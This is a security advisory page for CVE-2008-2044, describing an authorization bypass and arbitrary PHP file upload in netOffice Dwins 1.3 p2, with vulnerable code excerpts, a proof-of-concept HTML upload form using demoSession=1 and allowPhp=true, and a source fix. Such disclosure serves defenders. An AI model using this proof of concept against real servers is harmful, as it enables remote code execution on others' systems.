|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 3845 CVE : CVE-2008-2044 SecurityRisk : High  (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : db Published : 01.05.2008
Advisory Content : netOffice Dwins 1.3 Remote code execution. -------------------------------------------------------- Product: netOffice Dwins Version: 1.3 p2 Vendor: http://netofficedwins.sourceforge.net/ Date: 02/29/08 - Introduction "netOffice Dwins is a free web based time tracking, timesheet, and project management environment." - Details It is possible for an attacker to bypass authorization, upload arbitrary PHP files, and then execute them on the server. netOffice extracts all GET, POST, SESSION, SERVER, and COOKIE parameters into the local variable space. This has the same effect as turning on register globals. The code below is from includes/library.php. //GET array if (!empty($_GET)) { extract($_GET); } else if (!empty($HTTP_GET_VARS)) { extract($HTTP_GET_VARS); } This lets an attacker set demoSession=1 to bypass authorization and freely access any part of the application. Setting the variable to one bypasses the first check ($demoSession != true) but the second boolean expression ($demoSession == 'true') evaluates to false thereby not initializing the action variable to an empty string. // check session validity, except for demo user if (($checkSession == true) && ($demoSession != true)) { // a client user trying to get outside of the "client project site" if (($profilSession == 3) && (!strstr($_SERVER['PHP_SELF'], 'projects_site'))) { header('Location: ../index.php?session=false'); exit; } // disable actions if demo user logged in demo mode if (!empty($action)) { if ($demoSession == 'true') { echo "true"; $closeTopic = ''; $addToSiteTask = ''; $removeToSiteTask = ''; $addToSiteTopic = ''; $removeToSiteTopic = ''; $addToSiteTeam = ''; $removeToSiteTeam = ''; $action = ''; $msg = 'demo'; } } Next an attacker could use access the uploadfile.php form without logging in to upload and execute PHP files. Normally php files are not allowed unless the allowPhp variable is set to true. - Proof of Concept <form accept-charset="UNKNOWN" method="POST" action="http://target/netoffice/projects_site/uploadfile.php?demoSession =1&allowPhp=true&action=add&project=&task=#filedetailsAnchor" name="feeedback" enctype="multipart/form-data"> <input type="hidden" name="MAX_FILE_SIZE" value="100000000"><input type="hidden" name="maxCustom" value=""> <table cellpadding="3" cellspacing="0" border="0"> <tr><th colspan="2">Upload Form</th></tr> <tr><th>Comments :</th><td><textarea cols="60" name="commentsField" rows="6"></textarea></td></tr> <tr><th>Upload :</th><td><input size="35" value="" name="upload" type="file"></td></tr> <tr><th> </th><td><input name="submit" type="submit" value="Save"><br><br></td></tr></table> </form> - Solution Authors were notified on 2/19, no fix is currently available. Edit the source to prevent authorization bypass. in includes/library.php change if ($demoSession == 'true') { to if ($demoSession == true) { Author: dB Email: dB [at] rawsecurity.org  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |